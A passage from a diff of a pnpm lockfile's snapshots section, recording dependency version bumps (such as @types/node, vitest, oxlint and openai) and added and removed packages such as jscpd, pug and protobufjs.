'@tloncorp/api@git+https://github.com/tloncorp/api-beta.git#7eede1c1a756977b09f96aa14a92e2b06318ae87': + '@tloncorp/api@https://codeload.github.com/tloncorp/api-beta/tar.gz/7eede1c1a756977b09f96aa14a92e2b06318ae87': dependencies: '@aws-sdk/client-s3': 3.1000.0 '@aws-sdk/s3-request-presigner': 3.1000.0 @@ -8928,24 +10077,24 @@ snapshots: transitivePeerDependencies: - aws-crt - '@tloncorp/tlon-skill-darwin-arm64@0.1.9': + '@tloncorp/tlon-skill-darwin-arm64@0.2.2': optional: true - '@tloncorp/tlon-skill-darwin-x64@0.1.9': + '@tloncorp/tlon-skill-darwin-x64@0.2.2': optional: true - '@tloncorp/tlon-skill-linux-arm64@0.1.9': + '@tloncorp/tlon-skill-linux-arm64@0.2.2': optional: true - '@tloncorp/tlon-skill-linux-x64@0.1.9': + '@tloncorp/tlon-skill-linux-x64@0.2.2': optional: true - '@tloncorp/tlon-skill@0.1.9': + '@tloncorp/tlon-skill@0.2.2': optionalDependencies: - '@tloncorp/tlon-skill-darwin-arm64': 0.1.9 - '@tloncorp/tlon-skill-darwin-x64': 0.1.9 - '@tloncorp/tlon-skill-linux-arm64': 0.1.9 - '@tloncorp/tlon-skill-linux-x64': 0.1.9 + '@tloncorp/tlon-skill-darwin-arm64': 0.2.2 + '@tloncorp/tlon-skill-darwin-x64': 0.2.2 + '@tloncorp/tlon-skill-linux-arm64': 0.2.2 + '@tloncorp/tlon-skill-linux-x64': 0.2.2 '@tokenizer/inflate@0.4.1': dependencies: @@ -9019,7 +10168,7 @@ snapshots: '@types/body-parser@1.19.6': dependencies: '@types/connect': 3.4.38 - '@types/node': 25.3.3 + '@types/node': 25.3.5 '@types/bun@1.3.9': dependencies: @@ -9039,7 +10188,7 @@ snapshots: '@types/connect@3.4.38': dependencies: - '@types/node': 25.3.3 + '@types/node': 25.3.5 '@types/deep-eql@4.0.2': {} @@ -9047,14 +10196,14 @@ snapshots: '@types/express-serve-static-core@4.19.8': dependencies: - '@types/node': 25.3.3 + '@types/node': 25.3.5 '@types/qs': 6.14.0 '@types/range-parser': 1.2.7 '@types/send': 1.2.1 '@types/express-serve-static-core@5.1.1': dependencies: - '@types/node': 25.3.3 + '@types/node': 25.3.5 '@types/qs': 6.14.0 '@types/range-parser': 1.2.7 '@types/send': 1.2.1 @@ -9083,7 +10232,7 @@ snapshots: '@types/jsonwebtoken@9.0.10': dependencies: '@types/ms': 2.1.0 - '@types/node': 25.3.3 + '@types/node': 25.3.5 '@types/linkify-it@5.0.0': {} @@ -9116,7 +10265,7 @@ snapshots: dependencies: undici-types: 7.16.0 - '@types/node@25.3.3': + '@types/node@25.3.5': dependencies: undici-types: 7.18.2 @@ -9129,31 +10278,33 @@ snapshots: '@types/request@2.48.13': dependencies: '@types/caseless': 0.12.5 - '@types/node': 25.3.3 + '@types/node': 25.3.5 '@types/tough-cookie': 4.0.5 form-data: 2.5.4 '@types/retry@0.12.0': {} + '@types/sarif@2.1.7': {} + '@types/send@0.17.6': dependencies: '@types/mime': 1.3.5 - '@types/node': 25.3.3 + '@types/node': 25.3.5 '@types/send@1.2.1': dependencies: - '@types/node': 25.3.3 + '@types/node': 25.3.5 '@types/serve-static@1.15.10': dependencies: '@types/http-errors': 2.0.5 - '@types/node': 25.3.3 + '@types/node': 25.3.5 '@types/send': 0.17.6 '@types/serve-static@2.2.0': dependencies: '@types/http-errors': 2.0.5 - '@types/node': 25.3.3 + '@types/node': 25.3.5 '@types/tough-cookie@4.0.5': {} @@ -9163,43 +10314,43 @@ snapshots: '@types/ws@8.18.1': dependencies: - '@types/node': 25.3.3 + '@types/node': 25.3.5 '@types/yauzl@2.10.3': dependencies: - '@types/node': 25.3.3 + '@types/node': 25.3.5 optional: true - '@typescript/native-preview-darwin-arm64@7.0.0-dev.20260301.1': + '@typescript/native-preview-darwin-arm64@7.0.0-dev.20260307.1': optional: true - '@typescript/native-preview-darwin-x64@7.0.0-dev.20260301.1': + '@typescript/native-preview-darwin-x64@7.0.0-dev.20260307.1': optional: true - '@typescript/native-preview-linux-arm64@7.0.0-dev.20260301.1': + '@typescript/native-preview-linux-arm64@7.0.0-dev.20260307.1': optional: true - '@typescript/native-preview-linux-arm@7.0.0-dev.20260301.1': + '@typescript/native-preview-linux-arm@7.0.0-dev.20260307.1': optional: true - '@typescript/native-preview-linux-x64@7.0.0-dev.20260301.1': + '@typescript/native-preview-linux-x64@7.0.0-dev.20260307.1': optional: true - '@typescript/native-preview-win32-arm64@7.0.0-dev.20260301.1': + '@typescript/native-preview-win32-arm64@7.0.0-dev.20260307.1': optional: true - '@typescript/native-preview-win32-x64@7.0.0-dev.20260301.1': + '@typescript/native-preview-win32-x64@7.0.0-dev.20260307.1': optional: true - '@typescript/native-preview@7.0.0-dev.20260301.1': + '@typescript/native-preview@7.0.0-dev.20260307.1': optionalDependencies: - '@typescript/native-preview-darwin-arm64': 7.0.0-dev.20260301.1 - '@typescript/native-preview-darwin-x64': 7.0.0-dev.20260301.1 - '@typescript/native-preview-linux-arm': 7.0.0-dev.20260301.1 - '@typescript/native-preview-linux-arm64': 7.0.0-dev.20260301.1 - '@typescript/native-preview-linux-x64': 7.0.0-dev.20260301.1 - '@typescript/native-preview-win32-arm64': 7.0.0-dev.20260301.1 - '@typescript/native-preview-win32-x64': 7.0.0-dev.20260301.1 + '@typescript/native-preview-darwin-arm64': 7.0.0-dev.20260307.1 + '@typescript/native-preview-darwin-x64': 7.0.0-dev.20260307.1 + '@typescript/native-preview-linux-arm': 7.0.0-dev.20260307.1 + '@typescript/native-preview-linux-arm64': 7.0.0-dev.20260307.1 + '@typescript/native-preview-linux-x64': 7.0.0-dev.20260307.1 + '@typescript/native-preview-win32-arm64': 7.0.0-dev.20260307.1 + '@typescript/native-preview-win32-x64': 7.0.0-dev.20260307.1 '@typespec/ts-http-runtime@0.3.3': dependencies: @@ -9213,12 +10364,6 @@ snapshots: '@urbit/aura@3.0.0': {} - '@urbit/http-api@3.0.0': - dependencies: - '@babel/runtime': 7.28.6 - browser-or-node: 1.3.0 - core-js: 3.48.0 - '@urbit/nockjs@1.6.0': {} '@vector-im/matrix-bot-sdk@0.8.0-element.3(@cypress/request@3.0.10)': @@ -9246,29 +10391,29 @@ snapshots: - '@cypress/request' - supports-color - '@vitest/browser-playwright@4.0.18(playwright@1.58.2)(vite@7.3.1(@types/node@25.3.3)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2))(vitest@4.0.18)': + '@vitest/browser-playwright@4.0.18(playwright@1.58.2)(vite@7.3.1(@types/node@25.3.5)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2))(vitest@4.0.18)': dependencies: - '@vitest/browser': 4.0.18(vite@7.3.1(@types/node@25.3.3)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2))(vitest@4.0.18) - '@vitest/mocker': 4.0.18(vite@7.3.1(@types/node@25.3.3)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2)) + '@vitest/browser': 4.0.18(vite@7.3.1(@types/node@25.3.5)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2))(vitest@4.0.18) + '@vitest/mocker': 4.0.18(vite@7.3.1(@types/node@25.3.5)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2)) playwright: 1.58.2 tinyrainbow: 3.0.3 - vitest: 4.0.18(@opentelemetry/api@1.9.0)(@types/node@25.3.3)(@vitest/browser-playwright@4.0.18)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2) + vitest: 4.0.18(@opentelemetry/api@1.9.0)(@types/node@25.3.5)(@vitest/browser-playwright@4.0.18)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2) transitivePeerDependencies: - bufferutil - msw - utf-8-validate - vite - '@vitest/browser@4.0.18(vite@7.3.1(@types/node@25.3.3)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2))(vitest@4.0.18)': + '@vitest/browser@4.0.18(vite@7.3.1(@types/node@25.3.5)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2))(vitest@4.0.18)': dependencies: - '@vitest/mocker': 4.0.18(vite@7.3.1(@types/node@25.3.3)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2)) + '@vitest/mocker': 4.0.18(vite@7.3.1(@types/node@25.3.5)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2)) '@vitest/utils': 4.0.18 magic-string: 0.30.21 pixelmatch: 7.1.0 pngjs: 7.0.0 sirv: 3.0.2 tinyrainbow: 3.0.3 - vitest: 4.0.18(@opentelemetry/api@1.9.0)(@types/node@25.3.3)(@vitest/browser-playwright@4.0.18)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2) + vitest: 4.0.18(@opentelemetry/api@1.9.0)(@types/node@25.3.5)(@vitest/browser-playwright@4.0.18)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2) ws: 8.19.0 transitivePeerDependencies: - bufferutil @@ -9276,7 +10421,7 @@ snapshots: - utf-8-validate - vite - '@vitest/coverage-v8@4.0.18(@vitest/browser@4.0.18(vite@7.3.1(@types/node@25.3.3)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2))(vitest@4.0.18))(vitest@4.0.18)': + '@vitest/coverage-v8@4.0.18(@vitest/browser@4.0.18(vite@7.3.1(@types/node@25.3.5)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2))(vitest@4.0.18))(vitest@4.0.18)': dependencies: '@bcoe/v8-coverage': 1.0.2 '@vitest/utils': 4.0.18 @@ -9288,9 +10433,9 @@ snapshots: obug: 2.1.1 std-env: 3.10.0 tinyrainbow: 3.0.3 - vitest: 4.0.18(@opentelemetry/api@1.9.0)(@types/node@25.3.3)(@vitest/browser-playwright@4.0.18)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2) + vitest: 4.0.18(@opentelemetry/api@1.9.0)(@types/node@25.3.5)(@vitest/browser-playwright@4.0.18)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2) optionalDependencies: - '@vitest/browser': 4.0.18(vite@7.3.1(@types/node@25.3.3)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2))(vitest@4.0.18) + '@vitest/browser': 4.0.18(vite@7.3.1(@types/node@25.3.5)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2))(vitest@4.0.18) '@vitest/expect@4.0.18': dependencies: @@ -9301,13 +10446,13 @@ snapshots: chai: 6.2.2 tinyrainbow: 3.0.3 - '@vitest/mocker@4.0.18(vite@7.3.1(@types/node@25.3.3)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2))': + '@vitest/mocker@4.0.18(vite@7.3.1(@types/node@25.3.5)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2))': dependencies: '@vitest/spy': 4.0.18 estree-walker: 3.0.3 magic-string: 0.30.21 optionalDependencies: - vite: 7.3.1(@types/node@25.3.3)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2) + vite: 7.3.1(@types/node@25.3.5)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2) '@vitest/pretty-format@4.0.18': dependencies: @@ -9400,6 +10545,8 @@ snapshots: dependencies: acorn: 8.16.0 + acorn@7.4.1: {} + acorn@8.16.0: {} acpx@0.1.15(zod@4.3.6): @@ -9481,17 +10628,21 @@ snapshots: array-flatten@1.1.1: {} + asap@2.0.6: {} + asn1@0.2.6: dependencies: safer-buffer: 2.1.2 + assert-never@1.4.0: {} + assert-plus@1.0.0: {} assertion-error@2.0.1: {} ast-kit@3.0.0-beta.1: dependencies: - '@babel/parser': 8.0.0-rc.1 + '@babel/parser': 8.0.0-rc.2 estree-walker: 3.0.3 pathe: 2.0.3 @@ -9551,6 +10702,12 @@ snapshots: b4a@1.8.0: {} + babel-walk@3.0.0-canary-5: + dependencies: + '@babel/types': 7.29.0 + + badgen@3.2.3: {} + balanced-match@4.0.4: {} bare-events@2.8.2: {} @@ -9575,6 +10732,11 @@ snapshots: birpc@4.0.0: {} + blamer@1.0.7: + dependencies: + execa: 4.1.0 + which: 2.0.2 + bluebird@3.7.2: {} body-parser@1.20.4: @@ -9618,7 +10780,9 @@ snapshots: dependencies: balanced-match: 4.0.4 - browser-or-node@1.3.0: {} + braces@3.0.3: + dependencies: + fill-range: 7.1.1 browser-or-node@3.0.0: {} @@ -9635,12 +10799,12 @@ snapshots: bun-types@1.3.9: dependencies: - '@types/node': 25.3.3 + '@types/node': 25.3.5 optional: true bytes@3.1.2: {} - cac@6.7.14: {} + cac@7.0.0: {} cacheable@2.3.2: dependencies: @@ -9681,6 +10845,10 @@ snapshots: character-entities-legacy@3.0.0: {} + character-parser@2.2.0: + dependencies: + is-regex: 1.2.1 + chmodrp@1.0.2: {} chokidar@5.0.0: @@ -9710,6 +10878,12 @@ snapshots: cli-spinners@3.4.0: {} + cli-table3@0.6.5: + dependencies: + string-width: 4.2.3 + optionalDependencies: + '@colors/colors': 1.5.0 + cliui@7.0.4: dependencies: string-width: 4.2.3 @@ -9748,6 +10922,8 @@ snapshots: color-support@1.1.3: optional: true + colors@1.4.0: {} + combined-stream@1.0.8: dependencies: delayed-stream: 1.0.0 @@ -9774,9 +10950,16 @@ snapshots: commander@14.0.3: {} + commander@5.1.0: {} + console-control-strings@1.1.0: optional: true + constantinople@4.0.1: + dependencies: + '@babel/parser': 7.29.0 + '@babel/types': 7.29.0 + content-disposition@0.5.4: dependencies: safe-buffer: 5.2.1 @@ -9791,8 +10974,6 @@ snapshots: cookie@0.7.2: {} - core-js@3.48.0: {} - core-util-is@1.0.2: {} core-util-is@1.0.3: {} @@ -9874,6 +11055,10 @@ snapshots: discord-api-types@0.38.40: {} + discord-api-types@0.38.41: {} + + doctypes@1.1.0: {} + dom-serializer@2.0.0: dependencies: domelementtype: 2.3.0 @@ -10023,6 +11208,18 @@ snapshots: transitivePeerDependencies: - bare-abort-controller + execa@4.1.0: + dependencies: + cross-spawn: 7.0.6 + get-stream: 5.2.0 + human-signals: 1.1.1 + is-stream: 2.0.1 + merge-stream: 2.0.0 + npm-run-path: 4.0.1 + onetime: 5.1.2 + signal-exit: 3.0.7 + strip-final-newline: 2.0.0 + expect-type@1.3.0: {} exponential-backoff@3.1.3: {} @@ -10116,12 +11313,24 @@ snapshots: fast-fifo@1.3.2: {} + fast-glob@3.3.3: + dependencies: + '@nodelib/fs.stat': 2.0.5 + '@nodelib/fs.walk': 1.2.8 + glob-parent: 5.1.2 + merge2: 1.4.1 + micromatch: 4.0.8 + fast-uri@3.1.0: {} fast-xml-parser@5.3.8: dependencies: strnum: 2.2.0 + fastq@1.20.1: + dependencies: + reusify: 1.1.0 + fd-slicer@1.1.0: dependencies: pend: 1.2.0 @@ -10150,6 +11359,10 @@ snapshots: dependencies: filename-reserved-regex: 3.0.0 + fill-range@7.1.1: + dependencies: + to-regex-range: 5.0.1 + finalhandler@1.3.2: dependencies: debug: 2.6.9 @@ -10296,6 +11509,12 @@ snapshots: dependencies: assert-plus: 1.0.0 + gitignore-to-glob@0.3.0: {} + + glob-parent@5.1.2: + dependencies: + is-glob: 4.0.3 + glob-to-regexp@0.4.1: {} glob@10.5.0: @@ -10350,6 +11569,16 @@ snapshots: - encoding - supports-color + grammy@1.41.1: + dependencies: + '@grammyjs/types': 3.25.0 + abort-controller: 3.0.0 + debug: 4.4.3 + node-fetch: 2.7.0 + transitivePeerDependencies: + - encoding + - supports-color + has-flag@4.0.0: {} has-own@1.0.1: {} @@ -10473,6 +11702,8 @@ snapshots: transitivePeerDependencies: - supports-color + human-signals@1.1.1: {} + iconv-lite@0.4.24: dependencies: safer-buffer: 2.1.2 @@ -10487,7 +11718,7 @@ snapshots: immediate@3.0.6: {} - import-in-the-middle@2.0.6: + import-in-the-middle@3.0.0: dependencies: acorn: 8.16.0 acorn-import-attributes: 1.9.5(acorn@8.16.0) @@ -10549,22 +11780,46 @@ snapshots: - bufferutil - utf-8-validate + is-core-module@2.16.1: + dependencies: + hasown: 2.0.2 + is-electron@2.2.2: {} + is-expression@4.0.0: + dependencies: + acorn: 7.4.1 + object-assign: 4.1.1 + + is-extglob@2.1.1: {} + is-fullwidth-code-point@3.0.0: {} is-fullwidth-code-point@5.1.0: dependencies: get-east-asian-width: 1.5.0 + is-glob@4.0.3: + dependencies: + is-extglob: 2.1.1 + is-interactive@2.0.0: {} + is-number@7.0.0: {} + is-plain-object@5.0.0: {} is-promise@2.2.2: {} is-promise@4.0.0: {} + is-regex@1.2.1: + dependencies: + call-bound: 1.0.4 + gopd: 1.2.0 + has-tostringtag: 1.0.2 + hasown: 2.0.2 + is-stream@2.0.1: {} is-typedarray@1.0.0: {} @@ -10602,10 +11857,31 @@ snapshots: jose@4.15.9: {} + js-stringify@1.0.2: {} + js-tokens@10.0.0: {} jsbn@0.1.1: {} + jscpd-sarif-reporter@4.0.6: + dependencies: + colors: 1.4.0 + fs-extra: 11.3.3 + node-sarif-builder: 3.4.0 + + jscpd@4.0.8: + dependencies: + '@jscpd/badge-reporter': 4.0.4 + '@jscpd/core': 4.0.4 + '@jscpd/finder': 4.0.4 + '@jscpd/html-reporter': 4.0.4 + '@jscpd/tokenizer': 4.0.4 + colors: 1.4.0 + commander: 5.1.0 + fs-extra: 11.3.3 + gitignore-to-glob: 0.3.0 + jscpd-sarif-reporter: 4.0.6 + jsesc@3.1.0: {} json-bigint@1.0.0: @@ -10655,6 +11931,11 @@ snapshots: json-schema: 0.4.0 verror: 1.10.0 + jstransformer@1.0.0: + dependencies: + is-promise: 2.2.2 + promise: 7.3.1 + jszip@3.10.1: dependencies: lie: 3.3.0 @@ -10877,9 +12158,13 @@ snapshots: punycode.js: 2.3.1 uc.micro: 2.1.0 + markdown-table@2.0.0: + dependencies: + repeat-string: 1.6.1 + marked@15.0.12: {} - marked@17.0.3: {} + marked@17.0.4: {} math-intrinsics@1.1.0: {} @@ -10905,6 +12190,10 @@ snapshots: merge-descriptors@2.0.0: {} + merge-stream@2.0.0: {} + + merge2@1.4.1: {} + methods@1.1.2: {} micromark-util-character@2.1.1: @@ -10924,6 +12213,11 @@ snapshots: micromark-util-types@2.0.2: {} + micromatch@4.0.8: + dependencies: + braces: 3.0.3 + picomatch: 2.3.1 + mime-db@1.52.0: {} mime-db@1.54.0: {} @@ -10938,6 +12232,8 @@ snapshots: mime@1.6.0: {} + mimic-fn@2.1.0: {} + mimic-function@5.0.1: {} minimalistic-assert@1.0.1: {} @@ -11088,6 +12384,11 @@ snapshots: node-readable-to-web-readable-stream@0.4.2: optional: true + node-sarif-builder@3.4.0: + dependencies: + '@types/sarif': 2.1.7 + fs-extra: 11.3.3 + node-wav@0.0.2: optional: true @@ -11110,6 +12411,10 @@ snapshots: nostr-wasm@0.1.0: {} + npm-run-path@4.0.1: + dependencies: + path-key: 3.1.1 + npmlog@5.0.1: dependencies: are-we-there-yet: 2.0.0 @@ -11168,6 +12473,10 @@ snapshots: dependencies: wrappy: 1.0.2 + onetime@5.1.2: + dependencies: + mimic-fn: 2.1.0 + onetime@7.0.0: dependencies: mimic-function: 5.0.1 @@ -11185,7 +12494,7 @@ snapshots: ws: 8.19.0 zod: 4.3.6 - openai@6.25.0(ws@8.19.0)(zod@4.3.6): + openai@6.27.0(ws@8.19.0)(zod@4.3.6): optionalDependencies: ws: 8.19.0 zod: 4.3.6 @@ -11291,61 +12600,61 @@ snapshots: osc-progress@0.3.0: {} - oxfmt@0.35.0: + oxfmt@0.36.0: dependencies: tinypool: 2.1.0 optionalDependencies: - '@oxfmt/binding-android-arm-eabi': 0.35.0 - '@oxfmt/binding-android-arm64': 0.35.0 - '@oxfmt/binding-darwin-arm64': 0.35.0 - '@oxfmt/binding-darwin-x64': 0.35.0 - '@oxfmt/binding-freebsd-x64': 0.35.0 - '@oxfmt/binding-linux-arm-gnueabihf': 0.35.0 - '@oxfmt/binding-linux-arm-musleabihf': 0.35.0 - '@oxfmt/binding-linux-arm64-gnu': 0.35.0 - '@oxfmt/binding-linux-arm64-musl': 0.35.0 - '@oxfmt/binding-linux-ppc64-gnu': 0.35.0 - '@oxfmt/binding-linux-riscv64-gnu': 0.35.0 - '@oxfmt/binding-linux-riscv64-musl': 0.35.0 - '@oxfmt/binding-linux-s390x-gnu': 0.35.0 - '@oxfmt/binding-linux-x64-gnu': 0.35.0 - '@oxfmt/binding-linux-x64-musl': 0.35.0 - '@oxfmt/binding-openharmony-arm64': 0.35.0 - '@oxfmt/binding-win32-arm64-msvc': 0.35.0 - '@oxfmt/binding-win32-ia32-msvc': 0.35.0 - '@oxfmt/binding-win32-x64-msvc': 0.35.0 + '@oxfmt/binding-android-arm-eabi': 0.36.0 + '@oxfmt/binding-android-arm64': 0.36.0 + '@oxfmt/binding-darwin-arm64': 0.36.0 + '@oxfmt/binding-darwin-x64': 0.36.0 + '@oxfmt/binding-freebsd-x64': 0.36.0 + '@oxfmt/binding-linux-arm-gnueabihf': 0.36.0 + '@oxfmt/binding-linux-arm-musleabihf': 0.36.0 + '@oxfmt/binding-linux-arm64-gnu': 0.36.0 + '@oxfmt/binding-linux-arm64-musl': 0.36.0 + '@oxfmt/binding-linux-ppc64-gnu': 0.36.0 + '@oxfmt/binding-linux-riscv64-gnu': 0.36.0 + '@oxfmt/binding-linux-riscv64-musl': 0.36.0 + '@oxfmt/binding-linux-s390x-gnu': 0.36.0 + '@oxfmt/binding-linux-x64-gnu': 0.36.0 + '@oxfmt/binding-linux-x64-musl': 0.36.0 + '@oxfmt/binding-openharmony-arm64': 0.36.0 + '@oxfmt/binding-win32-arm64-msvc': 0.36.0 + '@oxfmt/binding-win32-ia32-msvc': 0.36.0 + '@oxfmt/binding-win32-x64-msvc': 0.36.0 - oxlint-tsgolint@0.15.0: + oxlint-tsgolint@0.16.0: optionalDependencies: - '@oxlint-tsgolint/darwin-arm64': 0.15.0 - '@oxlint-tsgolint/darwin-x64': 0.15.0 - '@oxlint-tsgolint/linux-arm64': 0.15.0 - '@oxlint-tsgolint/linux-x64': 0.15.0 - '@oxlint-tsgolint/win32-arm64': 0.15.0 - '@oxlint-tsgolint/win32-x64': 0.15.0 + '@oxlint-tsgolint/darwin-arm64': 0.16.0 + '@oxlint-tsgolint/darwin-x64': 0.16.0 + '@oxlint-tsgolint/linux-arm64': 0.16.0 + '@oxlint-tsgolint/linux-x64': 0.16.0 + '@oxlint-tsgolint/win32-arm64': 0.16.0 + '@oxlint-tsgolint/win32-x64': 0.16.0 - oxlint@1.50.0(oxlint-tsgolint@0.15.0): + oxlint@1.51.0(oxlint-tsgolint@0.16.0): optionalDependencies: - '@oxlint/binding-android-arm-eabi': 1.50.0 - '@oxlint/binding-android-arm64': 1.50.0 - '@oxlint/binding-darwin-arm64': 1.50.0 - '@oxlint/binding-darwin-x64': 1.50.0 - '@oxlint/binding-freebsd-x64': 1.50.0 - '@oxlint/binding-linux-arm-gnueabihf': 1.50.0 - '@oxlint/binding-linux-arm-musleabihf': 1.50.0 - '@oxlint/binding-linux-arm64-gnu': 1.50.0 - '@oxlint/binding-linux-arm64-musl': 1.50.0 - '@oxlint/binding-linux-ppc64-gnu': 1.50.0 - '@oxlint/binding-linux-riscv64-gnu': 1.50.0 - '@oxlint/binding-linux-riscv64-musl': 1.50.0 - '@oxlint/binding-linux-s390x-gnu': 1.50.0 - '@oxlint/binding-linux-x64-gnu': 1.50.0 - '@oxlint/binding-linux-x64-musl': 1.50.0 - '@oxlint/binding-openharmony-arm64': 1.50.0 - '@oxlint/binding-win32-arm64-msvc': 1.50.0 - '@oxlint/binding-win32-ia32-msvc': 1.50.0 - '@oxlint/binding-win32-x64-msvc': 1.50.0 - oxlint-tsgolint: 0.15.0 + '@oxlint/binding-android-arm-eabi': 1.51.0 + '@oxlint/binding-android-arm64': 1.51.0 + '@oxlint/binding-darwin-arm64': 1.51.0 + '@oxlint/binding-darwin-x64': 1.51.0 + '@oxlint/binding-freebsd-x64': 1.51.0 + '@oxlint/binding-linux-arm-gnueabihf': 1.51.0 + '@oxlint/binding-linux-arm-musleabihf': 1.51.0 + '@oxlint/binding-linux-arm64-gnu': 1.51.0 + '@oxlint/binding-linux-arm64-musl': 1.51.0 + '@oxlint/binding-linux-ppc64-gnu': 1.51.0 + '@oxlint/binding-linux-riscv64-gnu': 1.51.0 + '@oxlint/binding-linux-riscv64-musl': 1.51.0 + '@oxlint/binding-linux-s390x-gnu': 1.51.0 + '@oxlint/binding-linux-x64-gnu': 1.51.0 + '@oxlint/binding-linux-x64-musl': 1.51.0 + '@oxlint/binding-openharmony-arm64': 1.51.0 + '@oxlint/binding-win32-arm64-msvc': 1.51.0 + '@oxlint/binding-win32-ia32-msvc': 1.51.0 + '@oxlint/binding-win32-x64-msvc': 1.51.0 + oxlint-tsgolint: 0.16.0 p-finally@1.0.0: {} @@ -11422,6 +12731,8 @@ snapshots: path-key@3.1.1: {} + path-parse@1.0.7: {} + path-scurry@1.11.1: dependencies: lru-cache: 10.4.3 @@ -11451,6 +12762,8 @@ snapshots: picocolors@1.1.1: {} + picomatch@2.3.1: {} + picomatch@4.0.3: {} pify@3.0.0: {} @@ -11516,6 +12829,10 @@ snapshots: process-warning@5.0.0: {} + promise@7.3.1: + dependencies: + asap: 2.0.6 + proper-lockfile@4.1.2: dependencies: graceful-fs: 4.2.11 @@ -11552,22 +12869,7 @@ snapshots: '@protobufjs/path': 1.1.2 '@protobufjs/pool': 1.1.0 '@protobufjs/utf8': 1.1.0 - '@types/node': 25.3.3 - long: 5.3.2 - - protobufjs@8.0.0: - dependencies: - '@protobufjs/aspromise': 1.1.2 - '@protobufjs/base64': 1.1.2 - '@protobufjs/codegen': 2.0.4 - '@protobufjs/eventemitter': 1.1.0 - '@protobufjs/fetch': 1.1.0 - '@protobufjs/float': 1.0.2 - '@protobufjs/inquire': 1.1.0 - '@protobufjs/path': 1.1.2 - '@protobufjs/pool': 1.1.0 - '@protobufjs/utf8': 1.1.0 - '@types/node': 25.3.3 + '@types/node': 25.3.5 long: 5.3.2 proxy-addr@2.0.7: @@ -11594,6 +12896,73 @@ snapshots: dependencies: punycode: 2.3.1 + pug-attrs@3.0.0: + dependencies: + constantinople: 4.0.1 + js-stringify: 1.0.2 + pug-runtime: 3.0.1 + + pug-code-gen@3.0.3: + dependencies: + constantinople: 4.0.1 + doctypes: 1.1.0 + js-stringify: 1.0.2 + pug-attrs: 3.0.0 + pug-error: 2.1.0 + pug-runtime: 3.0.1 + void-elements: 3.1.0 + with: 7.0.2 + + pug-error@2.1.0: {} + + pug-filters@4.0.0: + dependencies: + constantinople: 4.0.1 + jstransformer: 1.0.0 + pug-error: 2.1.0 + pug-walk: 2.0.0 + resolve: 1.22.11 + + pug-lexer@5.0.1: + dependencies: + character-parser: 2.2.0 + is-expression: 4.0.0 + pug-error: 2.1.0 + + pug-linker@4.0.0: + dependencies: + pug-error: 2.1.0 + pug-walk: 2.0.0 + + pug-load@3.0.0: + dependencies: + object-assign: 4.1.1 + pug-walk: 2.0.0 + + pug-parser@6.0.0: + dependencies: + pug-error: 2.1.0 + token-stream: 1.0.0 + + pug-runtime@3.0.1: {} + + pug-strip-comments@2.0.0: + dependencies: + pug-error: 2.1.0 + + pug-walk@2.0.0: {} + + pug@3.0.3: + dependencies: + pug-code-gen: 3.0.3 + pug-filters: 4.0.0 + pug-lexer: 5.0.1 + pug-linker: 4.0.0 + pug-load: 3.0.0 + pug-parser: 6.0.0 + pug-runtime: 3.0.1 + pug-strip-comments: 2.0.0 + pump@3.0.4: dependencies: end-of-stream: 1.4.5 @@ -11622,6 +12991,8 @@ snapshots: querystringify@2.2.0: {} + queue-microtask@1.2.3: {} + quick-format-unescaped@4.0.4: {} range-parser@1.2.1: {} @@ -11687,6 +13058,10 @@ snapshots: dependencies: regex-utilities: 2.3.0 + repeat-string@1.6.1: {} + + reprism@0.0.11: {} + request-promise-core@1.1.3(@cypress/request@3.0.10): dependencies: lodash: 4.17.23 @@ -11707,6 +13082,12 @@ snapshots: resolve-pkg-maps@1.0.0: {} + resolve@1.22.11: + dependencies: + is-core-module: 2.16.1 + path-parse: 1.0.7 + supports-preserve-symlinks-flag: 1.0.0 + restore-cursor@5.1.0: dependencies: onetime: 7.0.0 @@ -11716,6 +13097,8 @@ snapshots: retry@0.13.1: {} + reusify@1.1.0: {} + rimraf@3.0.2: dependencies: glob: 7.2.3 @@ -11725,42 +13108,44 @@ snapshots: dependencies: glob: 10.5.0 - rolldown-plugin-dts@0.22.2(@typescript/native-preview@7.0.0-dev.20260301.1)(rolldown@1.0.0-rc.5)(typescript@5.9.3): + rolldown-plugin-dts@0.22.4(@typescript/native-preview@7.0.0-dev.20260307.1)(rolldown@1.0.0-rc.7)(typescript@5.9.3): dependencies: - '@babel/generator': 8.0.0-rc.1 - '@babel/helper-validator-identifier': 8.0.0-rc.1 - '@babel/parser': 8.0.0-rc.1 - '@babel/types': 8.0.0-rc.1 + '@babel/generator': 8.0.0-rc.2 + '@babel/helper-validator-identifier': 8.0.0-rc.2 + '@babel/parser': 8.0.0-rc.2 + '@babel/types': 8.0.0-rc.2 ast-kit: 